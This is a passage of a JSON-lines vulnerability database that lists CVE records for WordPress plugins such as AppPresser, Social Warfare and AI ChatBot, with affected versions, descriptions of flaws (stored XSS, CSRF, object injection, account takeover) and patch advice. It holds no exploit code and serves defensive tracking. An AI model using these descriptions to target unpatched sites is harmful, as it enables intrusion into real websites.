version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/worpit-admin-dashboard-plugin\\\/tags\\\/4.4.5\\\/lib\\\/src\\\/LegacyApi\\\/RequestParameters.php#L42\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/worpit-admin-dashboard-plugin\\\/tags\\\/4.4.5\\\/lib\\\/src\\\/LegacyApi\\\/RequestParameters.php#L42\",\"refsource\":\"\",\"tags\":[\"Patch\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/worpit-admin-dashboard-plugin\\\/tags\\\/4.4.5\\\/src\\\/api\\\/RequestParameters.php#L14\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/worpit-admin-dashboard-plugin\\\/tags\\\/4.4.5\\\/src\\\/api\\\/RequestParameters.php#L14\",\"refsource\":\"\",\"tags\":[\"Patch\"]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6f25b0cc-60ec-49a0-8356-fd3fba97e987?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6f25b0cc-60ec-49a0-8356-fd3fba97e987?source=cve\",\"refsource\":\"\",\"tags\":[\"Third Party Advisory\"]}]"}
{"CVE_ID":"CVE-2024-10896","slug":"logo-slider-wp","versionImpact":"4.1.0","versionEndExcluding":"4.5.0","description":"The Logo Slider  WordPress plugin before 4.5.0 does not sanitise and escape some of its Logo and Slider settings, which could allow high privilege users such as Contributor to perform Stored Cross-Site Scripting","recommendation":"Update to version 4.5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1304c2b6-922d-455e-bae8-d6bf855eddd9\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1304c2b6-922d-455e-bae8-d6bf855eddd9\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10473","slug":"logo-slider-wp","versionImpact":"4.1.0","versionEndExcluding":"4.5.0","description":"The Logo Slider  WordPress plugin before 4.5.0 does not sanitise and escape some of its Logo Settings when outputing them in pages where the Logo Slider shortcode is embed, which could allow users with a role as low as Author to perform Cross-Site Scripting attacks.","recommendation":"Update to version 4.5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7512cbdf-cf27-4a1f-bac8-9fcb14bf463e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7512cbdf-cf27-4a1f-bac8-9fcb14bf463e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13520","slug":"gift-voucher","versionImpact":"4.4.9","versionEndExcluding":"4.5.0","description":"The Gift Cards (Gift Vouchers and Packages) (WooCommerce Supported) plugin for WordPress is vulnerable to unauthorized modification of data|loss of data due to a missing capability check on the 'update_voucher_price', 'update_voucher_date', 'update_voucher_note' functions in all versions up to, and including, 4.4.6. This makes it possible for unauthenticated attackers to update the value, expiration date, and user note for any gift voucher.","recommendation":"Update to version 4.5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gift-voucher\\\/trunk\\\/include\\\/edit-order-voucher.php#L30\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gift-voucher\\\/trunk\\\/include\\\/edit-order-voucher.php#L30\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gift-voucher\\\/trunk\\\/include\\\/edit-order-voucher.php#L5\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gift-voucher\\\/trunk\\\/include\\\/edit-order-voucher.php#L5\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gift-voucher\\\/trunk\\\/include\\\/edit-order-voucher.php#L56\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gift-voucher\\\/trunk\\\/include\\\/edit-order-voucher.php#L56\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/190a21cd-9716-4a57-a793-63309c339427?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/190a21cd-9716-4a57-a793-63309c339427?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4371","slug":"woolementor","versionImpact":"4.4.1","versionEndExcluding":"4.5","description":"The CoDesigner WooCommerce Builder for Elementor \u2013 Customize Checkout, Shop, Email, Products & More plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 4.4.1 via deserialization of untrusted input from the recently_viewed_products cookie. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"Update to version 4.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d1e5131a-9e72-441d-971c-8b9af35cf3f7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d1e5131a-9e72-441d-971c-8b9af35cf3f7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3099922%40woolementor&new=3099922%40woolementor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3099922%40woolementor&new=3099922%40woolementor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1660","slug":"chatbot","versionEndExcluding":"4.4.9","description":"The AI ChatBot WordPress plugin before 4.4.9 does not have authorisation and CSRF in a function hooked to init, allowing unauthenticated users to update some settings, leading to Stored XSS due to the lack of escaping when outputting them in the admin dashboard","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1a5cbcfc-fa55-433a-a76b-3881b6c4bea2\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1a5cbcfc-fa55-433a-a76b-3881b6c4bea2\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1651","slug":"chatbot","versionEndExcluding":"4.4.9","description":"The AI ChatBot WordPress plugin before 4.4.9 does not have authorisation and CSRF in the AJAX action responsible to update the OpenAI settings, allowing any authenticated users, such as subscriber to update them. Furthermore, due to the lack of escaping of the settings, this could also lead to Stored XSS","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c88b22ba-4fc2-49ad-a457-224157521bad\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c88b22ba-4fc2-49ad-a457-224157521bad\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-23705","slug":"wp-books-gallery","versionEndExcluding":"4.4.9","description":"Cross-Site Request Forgery (CSRF) vulnerability in HM Plugin WordPress Books Gallery plugin <=\u00a04.4.8 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-books-gallery\\\/wordpress-wordpress-books-gallery-plugin-4-4-8-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-books-gallery\\\/wordpress-wordpress-books-gallery-plugin-4-4-8-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1650","slug":"chatbot","versionEndExcluding":"4.4.7","description":"The AI ChatBot WordPress plugin before 4.4.7 unserializes user input from cookies via an AJAX action available to unauthenticated users, which could allow them to perform PHP Object Injection when a suitable gadget is present on the blog","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7d7fe498-0aa3-4fa7-b560-610b42b2abed\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7d7fe498-0aa3-4fa7-b560-610b42b2abed\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11024","slug":"apppresser","versionImpact":"4.4.6","versionEndExcluding":"4.4.7","description":"The AppPresser \u2013 Mobile App Framework plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 4.4.6. This is due to the plugin not properly validating a user's password reset code prior to updating their password. This makes it possible for unauthenticated attackers, with knowledge of a user's email address, to reset the user's password and gain access to their account.","recommendation":"Update to version 4.4.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3192531\\\/apppresser\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3192531\\\/apppresser\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/43cb0399-4add-43d5-863c-30e11803bd90?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/43cb0399-4add-43d5-863c-30e11803bd90?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7071","slug":"essential-blocks","versionImpact":"4.4.6","versionEndExcluding":"4.4.7","description":"The Essential Blocks \u2013 Page Builder Gutenberg Blocks, Patterns & Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Table of Contents block in all versions up to, and including, 4.4.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.4.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f969cb24-734f-46e5-a74d-fddf8e61e096?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f969cb24-734f-46e5-a74d-fddf8e61e096?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-blocks\\\/trunk\\\/blocks\\\/TableOfContents.php#L138\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-blocks\\\/trunk\\\/blocks\\\/TableOfContents.php#L138\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3018547\\\/essential-blocks\\\/tags\\\/4.4.7\\\/blocks\\\/TableOfContents.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3018547\\\/essential-blocks\\\/tags\\\/4.4.7\\\/blocks\\\/TableOfContents.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1959","slug":"social-warfare","versionImpact":"4.4.6.1","versionEndExcluding":"4.4.6.2","description":"The Social Sharing Plugin \u2013 Social Warfare plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'socialWarfare' shortcode in all versions up to, and including, 4.4.6.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.4.6.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1016f16c-0ab2-4cac-a7a5-8d93a37e7894?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1016f16c-0ab2-4cac-a7a5-8d93a37e7894?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-warfare\\\/tags\\\/4.4.5.1\\\/lib\\\/buttons-panel\\\/SWP_Buttons_Panel_Shortcode.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-warfare\\\/tags\\\/4.4.5.1\\\/lib\\\/buttons-panel\\\/SWP_Buttons_Panel_Shortcode.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3064109%40social-warfare&new=3064109%40social-warfare&sfp_email=&sfph_mail=#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3064109%40social-warfare&new=3064109%40social-warfare&sfp_email=&sfph_mail=#file1\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13692","slug":"woo-refund-and-exchange-lite","versionImpact":"4.4.5","versionEndExcluding":"4.4.6","description":"The Return Refund and Exchange For WooCommerce \u2013 Return Management System, RMA Exchange, Wallet And Cancel Order Features plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 4.4.5 via several functions due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to overwrite linked refund image attachments, overwrite refund request message, overwrite order messages, and read order messages of other users.","recommendation":"Update to version 4.4.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-refund-and-exchange-lite\\\/trunk\\\/common\\\/class-woo-refund-and-exchange-lite-common.php#L127\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-refund-and-exchange-lite\\\/trunk\\\/common\\\/class-woo-refund-and-exchange-lite-common.php#L127\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-refund-and-exchange-lite\\\/trunk\\\/common\\\/class-woo-refund-and-exchange-lite-common.php#L186\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-refund-and-exchange-lite\\\/trunk\\\/common\\\/class-woo-refund-and-exchange-lite-common.php#L186\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-refund-and-exchange-lite\\\/trunk\\\/common\\\/class-woo-refund-and-exchange-lite-common.php#L374\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-refund-and-exchange-lite\\\/trunk\\\/common\\\/class-woo-refund-and-exchange-lite-common.php#L374\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-refund-and-exchange-lite\\\/trunk\\\/public\\\/class-woo-refund-and-exchange-lite-public.php#L381\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-refund-and-exchange-lite\\\/trunk\\\/public\\\/class-woo-refund-and-exchange-lite-public.php#L381\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3236486\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3236486\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dafbf6e2-1160-4551-a987-5e94c9157ff2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dafbf6e2-1160-4551-a987-5e94c9157ff2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13641","slug":"woo-refund-and-exchange-lite","versionImpact":"4.4.5","versionEndExcluding":"4.4.6","description":"The Return Refund and Exchange For WooCommerce \u2013 Return Management System, RMA Exchange, Wallet And Cancel Order Features plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.4.5 via the 'attachment' directory. This makes it possible for unauthenticated attackers to extract sensitive data stored insecurely in the \/wp-content\/attachment directory which can contain file attachments for order refunds.","recommendation":"Update to version 4.4.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-refund-and-exchange-lite\\\/trunk\\\/common\\\/class-woo-refund-and-exchange-lite-common.php#L127\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-refund-and-exchange-lite\\\/trunk\\\/common\\\/class-woo-refund-and-exchange-lite-common.php#L127\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3236486\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3236486\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5f88a21d-28a9-4c91-9bf9-6b69f6a420e8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5f88a21d-28a9-4c91-9bf9-6b69f6a420e8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4383","slug":"simple-membership","versionImpact":"4.4.5","versionEndExcluding":"4.4.6","description":"The Simple Membership plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'swpm_paypal_subscription_cancel_link' shortcode in all versions up to, and including, 4.4.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.4.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3081024\\\/simple-membership\\\/trunk\\\/classes\\\/shortcode-related\\\/class.swpm-shortcodes-handler.php?old=3010737&old_path=%2Fsimple-membership%2Ftrunk%2Fclasses%2Fshortcode-related%2Fclass.swpm-shortcodes-handler.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3081024\\\/simple-membership\\\/trunk\\\/classes\\\/shortcode-related\\\/class.swpm-shortcodes-handler.php?old=3010737&old_path=%2Fsimple-membership%2Ftrunk%2Fclasses%2Fshortcode-related%2Fclass.swpm-shortcodes-handler.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-membership\\\/tags\\\/4.4.3\\\/classes\\\/shortcode-related\\\/class.swpm-shortcodes-handler.php#L228\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-membership\\\/tags\\\/4.4.3\\\/classes\\\/shortcode-related\\\/class.swpm-shortcodes-handler.php#L228\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/56fdbf80-8ea2-412a-b166-b7c27de88e70?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/56fdbf80-8ea2-412a-b166-b7c27de88e70?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2031","slug":"video-conferencing-with-zoom-api","versionImpact":"4.4.4","versionEndExcluding":"4.4.5","description":"The Video Conferencing with Zoom plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'zoom_recordings_by_meeting' shortcode in all versions up to, and including, 4.4.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.4.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/06e48355-6932-4401-8787-e6432444930f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/06e48355-6932-4401-8787-e6432444930f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3048838\\\/video-conferencing-with-zoom-api\\\/trunk\\\/includes\\\/Shortcodes\\\/Recordings.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3048838\\\/video-conferencing-with-zoom-api\\\/trunk\\\/includes\\\/Shortcodes\\\/Recordings.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1011","slug":"chatbot","versionEndExcluding":"4.4.5","description":"The AI ChatBot WordPress plugin before 4.4.5 does not escape most of its settings before outputting them back in the dashboard, and does not have a proper CSRF check, allowing attackers to make a logged in admin set XSS payloads in them.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d1784446-b3da-4175-9dac-20b030f19984\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d1784446-b3da-4175-9dac-20b030f19984\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9305","slug":"apppresser","versionImpact":"4.4.4","versionEndExcluding":"4.4.5","description":"The AppPresser \u2013 Mobile App Framework plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 4.4.4. This is due to the appp_reset_password() and validate_reset_password() functions not having enough controls to prevent a successful brute force attack of the OTP to change a password, or verify that a password reset request came from an authorized user. This makes it possible for unauthenticated attackers to generate and brute force an OTP that makes it possible to change any users passwords, including an administrator.","recommendation":"Update to version 4.4.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/45647fa6-a98d-4eb4-a287-f523e434688b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/45647fa6-a98d-4eb4-a287-f523e434688b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/apppresser\\\/tags\\\/4.4.4\\\/inc\\\/AppPresser_Ajax_Extras.php#L31\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/apppresser\\\/tags\\\/4.4.4\\\/inc\\\/AppPresser_Ajax_Extras.php#L31\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/apppresser\\\/tags\\\/4.4.4\\\/inc\\\/AppPresser_WPAPI_Mods.php#L92\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/apppresser\\\/tags\\\/4.4.4\\\/inc\\\/AppPresser_WPAPI_Mods.php#L92\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3168744%40apppresser&new=3168744%40apppresser&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3168744%40apppresser&new=3168744%40apppresser&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4842","slug":"social-warfare","versionImpact":"4.4.3","versionEndExcluding":"4.4.4","description":"The Social Sharing Plugin - Social Warfare plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'social_warfare' shortcode in versions up to, and including, 4.4.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.4.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8f5b9aff-0833-4887-ae59-df5bc88c7f91?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8f5b9aff-0833-4887-ae59-df5bc88c7f91?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-warfare\\\/tags\\\/4.4.1\\\/lib\\\/buttons-panel\\\/SWP_Buttons_Panel_Trait.php#L304\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-warfare\\\/tags\\\/4.4.1\\\/lib\\\/buttons-panel\\\/SWP_Buttons_Panel_Trait.php#L304\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-warfare\\\/tags\\\/4.4.1\\\/lib\\\/buttons-panel\\\/SWP_Buttons_Panel_Trait.php#L877\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-warfare\\\/tags\\\/4.4.1\\\/lib\\\/buttons-panel\\\/SWP_Buttons_Panel_Trait.php#L877\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2982662\\\/social-warfare#file0\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2982662\\\/social-warfare#file0\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2088","slug":"social-networks-auto-poster-facebook-twitter-g","versionImpact":"4.4.3","versionEndExcluding":"4.4.4","description":"The NextScripts: Social Networks Auto-Poster plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.4.3 via the 'nxs_getExpSettings' function. This makes it possible for authenticated attackers, with subscriber access and above, to extract sensitive data including social network API keys and secrets.","recommendation":"Update to version 4.4.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/70724bc7-c1f4-4965-8bba-99b2ed21d34b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/70724bc7-c1f4-4965-8bba-99b2ed21d34b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-networks-auto-poster-facebook-twitter-g\\\/trunk\\\/inc\\\/nxs_functions_wp.php#L620\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-networks-auto-poster-facebook-twitter-g\\\/trunk\\\/inc\\\/nxs_functions_wp.php#L620\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3084635\\\/social-networks-auto-poster-facebook-twitter-g\\\/trunk\\\/inc\\\/nxs_functions_wp.php?contextall=1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3084635\\\/social-networks-auto-poster-facebook-twitter-g\\\/trunk\\\/inc\\\/nxs_functions_wp.php?contextall=1\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1762","slug":"social-networks-auto-poster-facebook-twitter-g","versionImpact":"4.4.3","versionEndExcluding":"4.4.4","description":"The NextScripts: Social Networks Auto-Poster plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the HTTP_USER_AGENT header in all versions up to, and including, 4.4.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This requires the victim to select view \"All Cron Events\" in order for the injection to fire.","recommendation":"Update to version 4.4.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8063a545-4792-4ab7-b188-0e51a0fcfed4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8063a545-4792-4ab7-b188-0e51a0fcfed4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-networks-auto-poster-facebook-twitter-g\\\/trunk\\\/NextScripts_SNAP.php#L74\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-networks-auto-poster-facebook-twitter-g\\\/trunk\\\/NextScripts_SNAP.php#L74\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-networks-auto-poster-facebook-twitter-g\\\/trunk\\\/inc\\\/nxs_functions_engine.php#L117\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-networks-auto-poster-facebook-twitter-g\\\/trunk\\\/inc\\\/nxs_functions_engine.php#L117\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-networks-auto-poster-facebook-twitter-g\\\/trunk\\\/inc\\\/nxs_functions_engine.php#L125\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-networks-auto-poster-facebook-twitter-g\\\/trunk\\\/inc\\\/nxs_functions_engine.php#L125\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&